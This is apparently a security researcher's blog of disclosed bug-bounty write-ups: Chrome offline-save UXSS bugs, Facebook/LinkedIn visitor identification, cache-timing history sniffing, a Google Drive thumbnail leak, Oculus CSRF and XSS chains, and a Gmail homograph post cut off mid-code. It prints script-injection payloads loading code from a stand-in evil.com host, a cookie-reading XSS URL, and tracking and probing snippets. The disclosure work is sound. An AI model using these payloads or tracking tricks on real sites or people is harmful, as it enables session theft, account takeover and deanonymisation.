A tale of two offline Chrome UXSS vulns


Every now and then I feel the urge to fiddle with things you wouldn’t really expect to be vulnerable. Once in a while some unexpectedly interesting results turn up.

UXSS, or universal XSS, vulnerabilities are interesting because they rely on a flaw in the web browser itself and therefore aren’t generally affected by a website’s own XSS protections. They could be abused to steal content and tokens from sites like Facebook and Google, or, in this case, even to access your local file system. Not exactly something you want to happen.


Some day this summer, I was tired of looking for regular XSS vulnerabilities, so I decided to take a leap of faith and go looking for a UXSS in Google Chrome. I must have been extremely lucky, because within a short period of time I found not one, but two of them. Unfortunately they did require some unusual user interaction, but they were certainly interesting enough to get fixed and rewarded by Google.

UXSSes often exploit privileged situations where some piece of code is mistakenly allowed to access or modify a page loaded in an iframe or window. Sometimes flaws in the renderers are abused that somehow turn creative payloads into valid HTML. Digging into the latter, I noticed that pages are actually handled by a separate parser when you save them for offline viewing. So I started saving a bunch of pages using CTRL + S to spot the differences.

The first thing I noticed was this thing called “Mark Of The Web”, an HTML comment indicating the page’s source URL that is inserted at the top of each saved page. We’ve probably all seen it before:


I went for the obvious and tried to break out of the HTML comment by appending “-->” followed by some HTML.


It didn’t work out


As you would expect, my payload got URL encoded. Browsers don’t usually encode the fragment identifier (the part after the hash in a URL), so I decided to give it one last try:


Now guess what…


Oh my god. It worked:


That was pretty cool. The attack scenario isn’t that impressive though: we’d have to pass a link like


And then our victim would need to save the page and open it afterwards. Could be better right?

I tried to look for a way to auto-save the target page using the download attribute:

<a href="https://www.fb.com#--><script/src=http://www.evil.com/a.js></script>" download>Click me</a>

Then I would automate this using JS and open the pages locally. Since we’re accessing the pages via the file:// protocol, the X-Frame-Options header does not apply, so we can load the downloaded pages in a hidden iframe, appending the malicious script we’d like to inject. It’d look like this:

<iframe src="./download.htm#--><script/src='http://www.evil.com/a.js'></script>" style="display:none"></iframe>

Upon saving this page, the victim would inject the malicious script into the downloaded files. When a saved page is then opened, the injected script executes and can steal its content. Because this all happens locally, over the file:// protocol, the attacker also has access to the local file system and the directory structure.
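A tiny helper makes the link construction above concrete (the function name and the console.log call are mine for illustration, not part of the original PoC):

```javascript
// Build a link whose fragment breaks out of the Mark Of The Web comment
// once the page is saved. The fragment is never URL-encoded by the browser.
function buildSavePayloadUrl(targetUrl, evilScriptUrl) {
  // "-->" closes the MOTW comment; everything after it becomes live HTML
  // in the saved file. "<\/script>" avoids closing an enclosing script block.
  return targetUrl + '#--><script src="' + evilScriptUrl + '"><\/script>';
}

console.log(buildSavePayloadUrl('https://www.fb.com', 'http://www.evil.com/a.js'));
```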

The final result looked like this:


Video PoC extracting my Facebook messages, mails and directory structure:



While fiddling with the issue described above, I noticed another bug in the ‘save as’ parser which would turn a properly escaped href anchor attribute into valid HTML:

<a href="http://www.example.com/#&quot;&gt;&lt;script&gt;alert(0)&lt;/script&gt;">link</a>

Upon saving, the HTML snippet above would turn into

<a href="http://www.example.com/#"><script>alert(0)</script>">link</a>


The cool thing about reporting this one is that the actual PoC was embedded in the page itself: to reproduce the vuln, the only thing they had to do was save the page and open it afterwards.


Google patched the issues in Chrome 48 and rewarded both of them with a $500 bounty each.

Happy hunting!




Surfing the web anonymously ain’t easy. Just like committing the perfect crime, the slightest detail could possibly reveal your identity.

A couple of months ago I set myself a challenge: finding a way to get as much information as possible about a visitor. There are several ways to gain insight into the identity of your visitors. Google Analytics can provide general demographic and geographic stats, third-party cookies can track their browsing behavior, and IP addresses sometimes reveal their location.

But I wasn’t looking for general info. I wanted to really get to know my visitors. Individually. From their middle name to their favorite dish – the more I’d get to know, the more my project would succeed. And who could think of a better information source than social media?

Knock – knock. Who’s there?

Getting a user’s real name proved to be quite easy – at least if they have LinkedIn. The business-oriented social network has this (creepy) functionality that lets people know who visited their profile. So I set up a test account. The only thing left was to include this HTML snippet:

<img src="https://www.linkedin.com/profile/view?id={USER_ID}" style="display:none"/>

This is essentially an intended CSRF vulnerability. When the visitor’s browser tries loading the image, LinkedIn will interpret this as a valid profile visit, thus revealing the person’s name to the website owner. Luckily, LinkedIn offers their users the option to remain anonymous under account settings.

The visitor’s name is often the key to lots of other information, depending on your Google skills and what they’ve shared with the web.

That’s all, folks?

Nope. “Get their name and Google them” sounds a bit cheap, right? We want private information that’s none of Google’s business.
The following attacks require a bit more time to set up, but with a specific goal in mind, they can be quite effective.

If we got lucky, we managed to get the visitor’s name in a single request. Simple requests can reveal a lot about you. I find it intriguing how the basics of web browsing can be exploited in certain contexts.

Upon requesting stuff that’s none of your business, Facebook used to throw a 404 NOT FOUND error. Your browser will interpret this as a failure: you requested something that doesn’t appear to exist. Additionally, it can trigger the onfailure event bound to the AJAX request.

In case the Facebook user does have permission to view a specific file, you’d get a 200 OK response, triggering the onsuccess event bound to the AJAX request. Explained in a simplified diagram:


In short: with a single AJAX request I was able to check whether a Facebook user had permission to view a given file or page. So what can we do with this?

  1. User-specific identification
    By sharing an attachment with a single person or a group of people, you can easily tell whether the visitor belongs to that group, simply by making their browser send a request to this file. This makes it possible to hide specific blog posts from your wife, boss or competitor – if they’re logged into Facebook.

  2. Who’s the admin of page x or application y?
    Simply by sending a request to the settings panel of a specific Facebook page / application, you could tell who owns it.
  3. Is my visitor in Facebook group z?
    You just had to share an attachment in a group and you’re all set! Simply make your visitor send a request to this attachment and do as you please!
  4. Does my visitor have a specific app installed?
    Yup – you could instantly ban Farmville players. It’d make the internet a bit brighter, wouldn’t it?
  5. … it also works for events and such
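The probing technique above can be sketched as follows. probeResource is browser-only (it rides on the visitor’s own Facebook session cookies), while classify is the pure decision step. All names and the attachment URL are my own illustration, not Facebook’s API:

```javascript
// Pure decision logic: a response that loads means the visitor can see
// the shared attachment; an error response means they cannot.
function classify(loaded) {
  return loaded ? 'can view (in the group)' : 'cannot view (not in the group)';
}

// Browser-only: fire a cross-origin probe with the visitor's cookies and
// report the outcome. An image probe needs no CORS read permission.
function probeResource(attachmentUrl, report) {
  var probe = new Image();
  probe.onload = function () { report(classify(true)); };   // 200 OK
  probe.onerror = function () { report(classify(false)); }; // 404 / 403
  probe.src = attachmentUrl;
}
```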


My PoC looked like this (screenie from the video I sent to Facebook).






I reported this issue to Facebook. They implemented a site-wide fix and thanked me with a nice bounty.



Social networks can tell a lot about your visitor. But who cares nowadays? There’s only one thing users are really afraid of when it comes to privacy.
Let’s uncover the answer to one of our deepest fears:

“Can a website check my porn history?”

or – for the non-existent women reading my blog:

“Can I remotely check whether my boyfriend watches porn?”

Ethics aside, it seems to be possible. In fact, you can check this for most websites – I only targeted porn to get your attention. The actual technique is a bit hacky, but works in general. A while ago, I put up this Dutch (sorry!) website that could tell which porn sites you visited:

Screenie. It says: “Busted! It seems you visited pornhub!”
https://www.benjijeenpornomens.be (roughly translated as ‘Are you a porn person’, click on the big orange button to see your results. When nothing was found, “Wisserke” should appear)

The test relies on this basic browsing principle we know as caching: upon visiting a webpage, certain files are stored locally. Next time you visit this page, these files can be loaded locally, minimizing the data traffic and speeding up the load.

The script takes a specific file that’s present on all pages – let’s say logo.png. Then it measures the loading time of logo.png + Math.random(), which won’t be present in the cache, and repeats this process until it has a reliable number of samples. By comparing the loading time of these uncached samples with the loading time of the possibly cached logo.png, we can tell whether the webpage was visited previously – the cached file will load considerably faster.
Simplified diagram showing how the cache works:
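The timing comparison can be sketched like this. timeLoad is browser-only; wasCached is the pure decision step. The 0.5 threshold factor is my guess at what “considerably faster” means, not a value taken from the original script:

```javascript
// Median of the cache-busted timing samples.
function median(values) {
  var sorted = values.slice().sort(function (a, b) { return a - b; });
  return sorted[Math.floor(sorted.length / 2)];
}

// Was the candidate file cached? Here: did it load in less than
// factor * the median uncached sample time (default factor 0.5)?
function wasCached(candidateMs, uncachedSamplesMs, factor) {
  return candidateMs < median(uncachedSamplesMs) * (factor || 0.5);
}

// Browser-only measurement: load url and report elapsed milliseconds.
function timeLoad(url, report) {
  var start = performance.now();
  var img = new Image();
  img.onload = img.onerror = function () { report(performance.now() - start); };
  img.src = url;
}
```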

Go ahead and try it yourself, just don’t forget to clear your cache afterwards. Safari users may have to set their cookies setting to “always allow” temporarily.

Both websites and users can take steps to mitigate this problem. Websites can limit the caching of sensitive files, while users can regularly clear their cache and use incognito / private mode (beware though: when the test is executed in the same incognito session, it will still work).

That’s it for today. Comments and feedback are more than welcome!
I found some nice Chrome bugs lately, by the way. Expect another write-up soon.

Happy hunting!


Did you like this write-up? Follow me on twitter for updates!




How a metal festival led to a Google Drive vulnerability


I occasionally work for one of Europe’s greatest metal festivals: Graspop Metal Meeting in Belgium. With the 20th edition coming up this year, the organization put together an amazing line-up. I’m not an expert in organizing a festival, but one thing I know for sure: you don’t want that line-up to get leaked.

Bands and tour managers may get quite upset when this happens, as they sometimes depend on the sales of other gigs in the neighborhood. Since some of these coveted secrets are transferred online, you need to double-check the safety of the communication tools you use. This is how I discovered an interesting vulnerability in Google Drive.


I recently read about @tomvg’s Google Drive Clickjacking vulnerability and thought a thumbnail leak could be quite interesting for line-up leaks, knowing that thumbnails can be rescaled to a 2048×2048 resolution. At this resolution, you could easily read the band names from the latest poster.

Thumbnails on the Google usercontent domain are publicly available if you know their unique token

I noticed thumbnails can be displayed to people who aren’t allowed to see the actual file. You’d only need to figure out their unique link that’d look like this:


Thumbnail stored on lh4.google.com/token

There is absolutely no way to link the long token above to the actual file ID. It can’t really be bruteforced, so the attacker would either need a way to make the victim leak the token, or extract the token from the file himself. But in the latter case, the attacker would have had access to the file, so he could have downloaded it right away. Right? Well, not entirely.

The unique thumbnail links are the same for different file revisions

It’s true that the attacker could have downloaded the file when he temporarily had access to it. However, Google Drive has an interesting feature called file revisions, allowing file owners to upload a new revision under the same file ID, and thus using the same thumbnail token.

New revision, new content, same thumbnail link (lh4.google.com/token)

Gotcha! If an attacker somehow temporarily received access to a specific file, then had his access revoked and the file got updated afterwards, he would still be able to see changes through the thumbnail. Sounds like an edge case, especially if I tell you those tokens expire after about two hours. So I kept digging.

Unique links expire after +/- two hours. Bummer!

Back to my initial concept: having the victim leak the current thumbnail token. And what would be more ironic than having the victim explicitly drop us the token? Yes, I’m talking about drag and drop.

I previously said I don’t trust copy-paste, but I don’t really trust drag-‘n-drop either.

Each Google Drive file has a unique thumbnail URL that displays the latest thumbnail. You can access it by going to


This link does not expire and only takes the file_id. Interesting! Unlike the static lh4 image it redirects to, this page is protected by authentication. Only the document owners are able to access it. Dang!

I was about to give up, until I noticed we could load the /thumbnail page within an iframe:


Do you see what’s so interesting about that? I’ll give you a moment to figure out.

Yup, we could simply embed the page in an iframe and have the victim drag and drop the static lh4.google.com image to our server. As we can’t really drag-’n-drop images over the web, most browsers will just paste the image link into a text area. Exactly what we need.

We can exploit drag ’n drop to bypass cross-origin protections and fetch the unique link from an iframe

There are some browser restrictions that prevent this particular attack scenario from happening. One of them is that you’re not able to drop content extracted from an iframe into a text field on the same window. We can easily bypass this by having our victim drag-’n-drop the image link to another window that doesn’t know where the data comes from.

But then there’s this other thing: drag previews. When dragging an image, you’ll see an opaque thumbnail of the content you are dragging. Only a moron would continue his actions when the confidential festival poster pops up out of nowhere, so I had to find a creative fix to work around that.


This is the moment where a neat CSS trick comes in. We can use the CSS scale transform to scale down the contents of an iframe. I just had to scale the image in a way that it wouldn’t be recognizable to the victim, so I scaled it down to about three by three pixels.
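A rough sketch of the trick in script form (the element id, helper names and exact scale factor are mine; the original simply used a CSS rule with the scale transform):

```javascript
// Pure step: the inline styles that shrink the iframe's rendered contents
// so the drag preview becomes an unrecognizable speck.
function shrinkStyles(factor) {
  return {
    transform: 'scale(' + factor + ')',
    transformOrigin: 'top left'
  };
}

// Browser-only step: apply those styles to an iframe on the page.
function applyShrink(frameId, factor) {
  var frame = document.getElementById(frameId);
  var styles = shrinkStyles(factor);
  frame.style.transform = styles.transform;
  frame.style.transformOrigin = styles.transformOrigin;
}
```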


CSS can be used to manipulate the visual drag and drop protections

At this point, I had everything in place to write some sort of game that would make a victim actually trigger the exploit.

You can see the exploit in action in this YouTube video:




This bug qualified under Google’s vulnerability report program. I’d like to thank the Google Security team for their prompt and friendly responses.

P.S. Make sure to check out this year’s killer line-up. Tickets are still available!
Happy hacking!


Opinion: the DocVille privacy debate

– click here for a PDF document in which I share my view on responsible disclosure, and why your company should start with it too –

On Tuesday evening, May 5th, @DocVille_BE held a debate on online privacy after a screening of Laura Poitras’ Snowden documentary “CitizenFour”. The panel consisted of Caroline De Geest (policy officer at the Liga voor de Mensenrechten), prof. Guido Van Steendam (KULeuven), Wauter Van Laethem (Vast Comité van Toezicht op de Inlichtingendiensten), Inti De Ceukelaire (myself, as an ethical hacker), Bart Tommelein (State Secretary for the Fight against Social Fraud, Privacy and the North Sea) and Willem Debeuckelaere (chairman of the Belgian Privacy Commission). The debate was moderated by Dominique Soenens of De Morgen.

As a 19-year-old youngster, I got to join the panel in my role as an ethical hacker. It turned out to be an interesting debate with a wide range of differing opinions. Unfortunately, the NMBS forced me to leave at the height of the discussion in order to catch my train connection home. On the train, I am writing down my experiences as a meddling kid among the “grown-ups”. I try to quote and refer as little as possible, because my opinion is strongly colored. The text below describes my personal experience, and thus not necessarily the exact opinions of my fine co-panelists.

“The technology sector evolves faster than our law books, with cybercrime leading the way.”

The beginning of the debate mainly focused on the contents of the documentary. The approach of the Belgian intelligence services and their alleged cooperation with the NSA was discussed. According to some that cooperation did happen, according to others it did not. One thing is certain: the government collects a lot of personal data. Well, not necessarily the government itself, but all kinds of operators, for instance from the telecom sector. The controversial data retention law was meant to standardize this storage. What exactly that entailed wasn’t entirely clear to me. In my eyes it comes down to the same thing: a year’s worth of metadata is collected and stored somewhere, spread across operators, each with their own security policy. What did become clear to me, as a legal layman, is that it is all very complex. Moreover, there is oversight. A lot of oversight, we were promised. Oversight and complex analyses take heaps of time, which suggests the Belgian privacy machine may not be as well-oiled as we would hope. The technology sector evolves faster than our law books, with cybercrime leading the way.


Does oversight really offer certainty, then? In my eyes it just means we have to bribe a higher link in the chain. Or hack it. Moreover, occasional “exceptions” could be made here and there, which turns the whole thing upside down again: if they want to get to your data, they can. They have been doing so for decades anyway, and in overdrive since 9/11. The government is actively present on the hacking scene and I don’t believe it will withdraw. Maybe it doesn’t have to. In an ideal world, the collected data is used solely and discreetly to improve state security. Hackers come in handy. In times of war, government hackers were even glorified. A popular example is the movie “The Imitation Game”, in which the British intelligence service, led by Alan Turing, cracked the German Nazi code – a true story that eventually contributed to the end of the war. Besides, we want to find the leaks before the terrorists do, right?


“Today’s internet is a gigantic playground for malicious computer nerds.”


The problem does not lie so much with the government and its mischief, like the controversial PRISM program – it lies in our perception of privacy in general. Online, we happily enter our personal data and assume it is safe there. Wrong. Online databases are a gold mine for malicious hackers, who have to answer for their actions even less than the government does. So the problem isn’t really that such things happen, but that they can happen. Our data is insufficiently protected. Today’s internet is a gigantic playground for malicious computer nerds.

“Gigantic hacks often start from the most innocent websites. You are only as secure as your weakest link.”

Companies should be prosecuted for nonchalance in their online security policy. Tommelein, who by his own account “doesn’t like creating new rules”, finds it – if I understood him correctly – sufficient to kindly ask companies to get their security in order. But that’s not how it works. Security costs companies heaps of money, and publicly invisible efforts are an easy place to cut costs. According to Tommelein there is a big difference between large companies and smaller ones, such as SMEs. Budget-wise, that is entirely true: a local fitness club doesn’t have the same security budget as the state security service. In reality, SMEs remain a perfect target in advanced hacks: attackers often look for the weakest link around the person they want to hack and abuse it. Do you use the same password on an unsecured website as for, say, your e-mail? Then you’re done for. Gigantic hacks often start from the most innocent websites, like your mom’s webshop. You are only as secure as your weakest link.

“Put less energy and budget into tracking down hackers. Fix your shit.”


The Privacy Commission pointed out that data theft does get prosecuted. That’s true, but the focus there is put on the wrong party, namely the hacker. After a hack, a company should first and foremost ask itself how such a thing could happen, rather than who is behind it. It often concerns unreachable foreign criminals, and the stolen data has been merrily copied across the internet anyway. Prosecuting out of revenge makes little sense: for every hacker in jail, twenty new ones appear. The affected customers don’t benefit from it either. The solution? Fix your shit – and communicate with affected customers (to this day not mandatory). Prevention is better than cure, of course.

“The basis for the current privacy law dates from 1992. Back then I wasn’t even born, and today’s internet was distant fiction.”

We still have a long way to go. A State Secretary for privacy? A fantastic initiative. Not imposing any obligation on companies to make an effort to protect our data? Less so. I thought that would be self-evident, certainly now that we link virtually everything to the internet. Hurray for digitization! Everything online! Even vital institutions such as hospitals cheerfully join in. Who is going to take the blame for the first internet murder? Once inside, changing a blood type is a relatively small modification that can go unnoticed. It is time we overhauled and modernized our privacy law. The basis for that text has, after all, existed since December 8th, 1992. Back then I wasn’t even born, and today’s internet was distant fiction.

It would be hypocritical to criticize the current system without offering an alternative solution. In this PDF document I lay out my plan. It isn’t perfect, but it certainly offers some interesting steps towards the future.

“The government doesn’t need to hold our hand in the fight against privacy leaks”

Change? Don’t worry, it’s coming.


After 342 checks and 210 complex analyses, perhaps.

But by then we will be lagging behind again.
In the meantime, I call on everyone to use common sense on the internet. The government doesn’t need to hold our hand in the fight against privacy leaks. Protect yourself, and above all, know what you throw onto the internet. Privacy is an illusion on the web, a promise that cannot be fully kept. Start from that assumption, and the internet really isn’t that scary.


Why I don’t trust copypaste

Whoever invented copy/paste was a genius. But did you know our ctrl-c ctrl-v smashing adoration sometimes leads to security problems? Here’s why.

Nowadays, everything needs to go fast and fluently. Security sometimes pays the price of this trend.
Combining user experience with security: it’s a tough balance to strike. The faster a message can get to its recipients, the better. Today I experienced this using Facebook chat.

I was talking to a good old friend when I accidentally hit ctrl-v instead of ctrl-c. Normally, this would be no big deal: I’d immediately notice my mistake and correct it. My friend wouldn’t notice anything.
But things went differently this time. I had been working on a Photoshop project earlier that day, so the data stored in my clipboard was not plain text, but an image. Facebook treats images differently: it sends them right away, without the need to press enter or “send”. Long story short: I sent my friend some image data from a project I’d been working on. Not a big deal, or is it?

As a security practitioner, I immediately started thinking about a possible exploit scenario. Found it.

I knew my friend @smiegles had just saved a screenshot to his desktop. So I approached him explaining I was doing research on some social engineering attack and asked him to go to this page and get the “secret code” for me.


In return, I did not get the code. I got something better:

Translation: how the fuck?

Yup, I got my hands on that screenshot without the “victim” even having a clue. That’s because the victim never actually copied any of the “secret code”. This can magically be done using just three lines of JavaScript:

document.oncut = new Function("return false");
document.oncopy = new Function("return false");
document.onpaste = new Function("return false");

Go ahead: right click > copy or smash ctrl-c as much as you want: it won’t work. And even better: you won’t even notice. While you think you’re helping your friend out, you’re actually sending him your old clipboard data. Without any verification. Aauuuch!

I sent this issue over to Facebook but due to the social engineering elements involved, it got labeled as a won’t-fix.
So make sure to always verify what you’re copy/pasting!
Hope you enjoyed reading about this trivial bug. Shoutout to @smiegles for helping me test this little bug.

Stay tuned for more and make sure to follow me on twitter.

See you next time!

Hacking Facebook’s Oculus

Let’s talk about Oculus VR, best known for the Oculus Rift, a popular virtual reality headset funded through Kickstarter in 2012. Earlier this year, Facebook acquired the company for $2 billion, making it an interesting new target in Facebook’s bug bounty program.

I was late to the party. Their inclusion in Facebook’s bug bounty had already been announced a few weeks earlier, and I was pretty sure the low-hanging fruit was already gone. I nevertheless started my quest for valuable bugs and eventually found what I was looking for.

In this blogpost, I will address each issue individually. I’m going to start off with the account takeover vulnerability, without a doubt one of the most interesting bugs I encountered in Oculus land.

1. From joining any group to complete admin account takeover

aka the administrator list: where security researchers meet

Creating an account at the Oculus developer center, you can either sign up as an individual or as part of a company.
Once you have your e-mail address verified, you can automatically choose any company related to your verified e-mail domain. If you’d, for example, manage to verify an @facebook-inc.com e-mail address, you would be able to join either Facebook, Instagram, Oculus, Parse or Moves. My goal was to join the Oculus company without having to verify an @oculusvr.com e-mail address.

I could either

  1. Find a way to bypass the verification process
  2. Look for a privilege escalation to change my company

Neither seemed feasible at first. So I clicked next and proceeded to the last registration step. Once I had chosen a company associated with my verified e-mail domain, I could choose to work on an existing project – or create a new one.


Here things got quite interesting: I noticed the CSRF token we saw in the choose-a-company form was not present this time. This cross-site request forgery issue would allow us to make someone from the same company change their project… to another project of the same company. Not that exciting, huh?


I tested once again. This time, I chose a project with an id that was not associated with my company. I was shocked to see I indeed was able to join another company’s project; in fact, I even joined the company itself. Cool! I could join the Oculus team and view some confidential details such as e-mail addresses etc. At first, I did not realize this privilege escalation and CSRF would actually allow me to take over accounts.

As a company administrator, we are able to edit all the details of the company’s linked employee accounts. Even the password and the e-mail address.
So here was the deal: all I would need to do is use the CSRF to make someone join one of my company’s projects and change his password. Bazing! We are able to hack Oculus accounts. But things got a little crazier. Just a little.

After reporting this bug to Facebook, I tried to reproduce the issue again. This time, I would use my company’s administrator account to join the Oculus team. I could not believe my eyes: I was still a company administrator. From the Oculus Team, this time. Long story short: I could hack any Oculus account without user interaction. I’d simply join their company – as a company administrator – and change their password.


Fun fact: it was nice to see my colleague Stephen Sclafani, who had used another vulnerability, in the company admin list. Well done, Stephen!

Long story short: things escalated quickly. From a lame CSRF, to an interesting privilege escalation CSRF, to an account takeover CSRF, to a complete account takeover without user interaction.


Vulnerability timeline:
September 5th, 2014 02:39AM – Reported to vendor
September 5th, 2014 02:40AM – Vulnerability confirmed by vendor (! Check the response time !)
September 8th, 2014 02:50AM – Vendor asks for fix confirmation
September 8th, 2014 02:52PM – Fix confirmed
October 15th, 2014 09:46PM – Bounty awarded

I did get a nice reward for this bug, but it did not even get close to Bitquark’s 5k for a similar account takeover. This is because Facebook took additional steps to mitigate the risk of account takeovers and decreased the payouts accordingly. I am nevertheless very happy with the award and want to thank the Facebook security team for their fast and friendly responses.

During my quest for Facebook bugs, I found some other valuable bugs I’m about to describe below. Enjoy!

2. Privilege escalation leading to cross site scripting

A company may have multiple e-mail domains linked to it. This can be done in the “Access Control” panel that only the company administrator can use. These domains are included in various forms as a joined array, as well as in the “update project” form:


As you can see, we got two domains listed: ceukelai.re and mailinator.com. I tried to submit the form without those listed and it just wouldn’t work. Then I tried adding another domain: I changed the “domains” field to ceukelai.re;mailinator.com;gmail.com. I was amazed to notice that gmail.com was magically added to my domain list, even though the use of public domains is not allowed. So it must have bypassed some security checks. I did not hesitate to test whether the XSS filter was bypassed as well, and my assumption was right: I could add malicious javascript payloads that would execute every time someone visited the access control page. In fact, not only could I achieve this as an administrator: as this was a privilege escalation as well, any company user could do so.
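The tampering step can be sketched as a one-liner (the helper name is mine; the “domains” field and semicolon separator come from the form described above):

```javascript
// Join the allowed domains and smuggle an extra, normally-forbidden
// entry onto the end of the semicolon-separated "domains" field.
function tamperDomains(allowedDomains, extraDomain) {
  return allowedDomains.concat([extraDomain]).join(';');
}

console.log(tamperDomains(['ceukelai.re', 'mailinator.com'], 'gmail.com'));
```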


Facebook rewarded me for both bugs with a nice and generous award. I would like to thank them for this! It’s always a pleasure working with them.

Vulnerability timeline:
August 26th, 2014 11:00PM – Reported to vendor
August 27th, 2014 09:41PM – Vulnerability confirmed by vendor (got a “PS: Nice work, Inti!” – reply as well. Awesome!)
September 8th, 2014 02:48AM  – Vendor asks for fix confirmation
September 8th, 2014 02:26PM  – Fix confirmed
September 9th, 2014 08:51PM – Bounty awarded

– Privilege escalation
August 26th, 2014 11:08PM – Reported to vendor
August 27th, 2014 09:31PM – Vulnerability confirmed by vendor
September 8th, 2014 07:12PM  – Vendor asks for fix confirmation
September 8th, 2014 07:41PM  – Fix not confirmed, still some nasty side-effects present
September 16th, 2014 11:05PM – Vendor asks again for fix confirmation
September 17th, 2014 12:09AM – Fix confirmed
September 17th, 2014 12:53AM – Bounty awarded

3. Another privilege escalation leading to cross-site scripting

If you liked the previous bug combo, you will definitely like this one. It's a bit more complex and therefore one of my favorites.

Remember the "update project" form I told you about earlier? It includes a CSRF token. That's good, right? Yes, but it is bad practice not to generate a fresh token for every form. This bug shows why.
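One robust way to prevent this kind of token reuse, sketched here under the assumption of an HMAC-based design (not Oculus' actual implementation), is to bind each CSRF token to the form it was issued for. A token minted for one form action then simply fails verification on any other:

```python
# Minimal sketch: CSRF tokens bound to both the session and the form
# action, so a token captured from one form is useless on another.
import hashlib
import hmac
import secrets

SECRET = secrets.token_bytes(32)  # server-side secret, kept out of the page

def csrf_token(session_id: str, form_action: str) -> str:
    msg = f"{session_id}:{form_action}".encode()
    return hmac.new(SECRET, msg, hashlib.sha256).hexdigest()

def verify(session_id: str, form_action: str, token: str) -> bool:
    # Constant-time comparison to avoid timing side channels.
    return hmac.compare_digest(token, csrf_token(session_id, form_action))
```

With this design, the "update project" token I reused would never have validated against the "create company" handler.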

Upon registration, when a user is asked to join a company linked to his or her e-mail domain, he or she is also able to create a new one. To create a new company, the user is prompted to provide some more details on the company in question, such as a phone number, street address and website. The user needs to make sure the information provided is valid because, and this is important, these details cannot be changed later on.


Of course I tried to inject all kinds of XSS payloads into these parameters: tests that didn't really get me far. I did notice that the company registration was processed by the same script used to update projects. In fact, there were quite a lot of similarities. Even the form token was the same. Only CompanyTypeId was different: COMPANY instead of PROJECT. Interesting!


So this wild idea began to haunt my brain: what if I could use the "update" action command to change my company details? I could perfectly well use the form token provided in the update project form: it would be the same. So I made myself a new form combining elements of both forms, "the best of both worlds": the company detail parameters from the "create company" form, and the CSRF token and update action from the "update project" form.

It felt a bit like building Frankenstein's monster and hoping it would come to life when struck by lightning. "This is never going to work." Until I executed the script and headed back to my company details: it worked.

So wow, another privilege escalation, allowing any company user to change the company's details. But then I thought of my previous bug: would this bypass the XSS filter once again? Turns out I got it right. Boom!


Vulnerability timeline:
September 5th, 2014 05:17PM – Reported to vendor
September 6th, 2014 02:29PM – Vulnerability confirmed by vendor
September 25th, 2014 12:20AM  – Vendor asks for fix confirmation
September 25th, 2014 03:50PM – Fix confirmed
October 14th , 2014 01:58AM – Bounty awarded

4. Reflected XSS

Whoosh. That was heavy! Time to lighten things up a bit with this low-profile, yet funny, reflected XSS!
If you want to download a particular game at the Oculus Share center, you first need to accept some terms and conditions. Then it takes you to your download link.

Do you see what I see? The temptation to change the "redirect" parameter to javascript:… was quite irresistible. Aaaaaand… it did not work.
Déjà vu. If I had learned anything from the bugs described above, it's that things never work out on the first try.

From some further testing, I learned the script would just check whether oculusvr.com or oculus.com is present in the parameter. That's all. Can you see what's wrong with that? Heck, I do: https://share.oculusvr.com/accept-revised-terms?redirect=javascript:alert(document.cookie+"oculusvr.com")
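Reconstructing the naive check from the observed behaviour (the actual server code is unknown, so this is a sketch), the flaw is plain substring matching. Parsing the URL and pinning the scheme and host closes the hole:

```python
# A substring check versus a proper URL check for a redirect parameter.
from urllib.parse import urlparse

def naive_redirect_ok(url: str) -> bool:
    # Anything containing the domain passes, including javascript: URIs
    # that merely mention "oculusvr.com" somewhere in the payload.
    return "oculusvr.com" in url or "oculus.com" in url

def strict_redirect_ok(url: str) -> bool:
    # Parse the URL and require an http(s) scheme plus an exact,
    # allow-listed host (hostnames here are illustrative).
    parsed = urlparse(url)
    return parsed.scheme in ("http", "https") and \
        parsed.hostname in ("share.oculusvr.com", "share.oculus.com")
```

My PoC URL sails through the naive check because the string "oculusvr.com" appears inside the alert payload, while the strict check rejects it for having a javascript: scheme.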



Vulnerability timeline:
September 9th, 2014 03:00PM – Reported to vendor
September 9th, 2014 11:57PM – Vulnerability confirmed by vendor
September 26th, 2014 09:02PM  – Vendor asks for fix confirmation
September 26th, 2014 09:12PM – Fix confirmed
October 14th , 2014 02:20AM – Bounty awarded

5. The dupes

For being quite late to the party, a dupe ratio of 2/8 bugs was quite OK. It was just a bit of a bummer that both of those bugs were account takeover vulnerabilities. That's why I decided to honor them as well in this write-up.

The first one was a password reset CSRF. If a company administrator adds a user to his company, the employee gets a temporary password and an activation link. After clicking the activation link, the user is prompted to choose a new password. Interestingly, this form was not protected by any CSRF token, which made it possible to make someone reset his or her password without ever knowing it. Here was my video PoC:


The second account takeover I found was less severe, but nevertheless interesting. The developer center is closely linked to the discussion board: if you register an account at the developer center, a forum account is created as well. When you delete your developer account, however, the forum account did not get deleted. I tried to create a new user with the same name as our orphan forum account, and guess what? I could regain access to it. In short: when someone's developer account was pruned, the forum account left behind could be claimed by anyone registering under the same name.

That was all for today. If you are interested in reading more about Facebook’s bug bounty program, this would be the place to be.

If you are interested in more detailed write-ups, make sure you follow me on Twitter!

Happy hacking!

[Dutch] ‘Zero days’ documentary featuring @smiegles @k8em0, @mikko & @Viss

The Dutch broadcast channel "NPO2" made a documentary about zero-day exploits, responsible disclosure and HackerOne. The broadcast features @k8em0, @mikko, @Viss and @smiegles, a young Dutch bug bounty hunter and friend of mine.

You can watch the zero day episode here:


Besides this, I have some exciting news: this Thursday (16/10) I will be featured in a documentary on responsible disclosure on the national Belgian broadcast channel. If you are interested in watching it, tune in around 8:40pm for the television show "Koppen" on broadcast channel "één". I will post a link to the documentary later on.

That’s all for now!

Gmail’s SMTPUTF8 prone to homographic attacks (thanks, 4chan!)

I always loved working with Google.

I have been participating in their program since 2012. Over the years, I reported some nice vulnerabilities that got me a couple of hall of fame entries and of course some nice monetary awards. But this last time, I drew a blank.

I spent some time researching Unicode last month. Browsing through a lot of interesting characters, two of them caught my eye: the soft hyphen and the zero-width space. These characters are basically nothing[1], except that they are there. Doing a bit of research, I quickly found that these characters were used to "blank post" on the popular image board 4chan.


Interesting. Naturally, it is not allowed to submit "empty" comments to the board, but using this single character, it was possible to bypass that restriction. Well, such a post is technically not empty; it just seems like it is. I started wondering whether this could lead to security implications on popular websites. Except for some low-priority design bugs, I did not find anything.

[1] The soft hyphen does have a function: it indicates where a word may be broken across lines.


Months passed by. I had forgotten about the special Unicode characters and moved on, looking for new and unique bugs. Until I saw this post on the Google Blog:


Gmail would now support e-mail addresses with Unicode characters. The extraordinary characters from earlier popped back into my head and I had this crazy idea:


Can you spot the difference? I can't. But believe me, they are different. The second one has a soft hyphen between "in" and "ti". So technically, this gives us an e-mail address that appears to be the same, but isn't. So what's the big deal?
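A quick way to see this is to compare the two strings in code; the address below is mine, with U+00AD inserted where the screenshot has it:

```python
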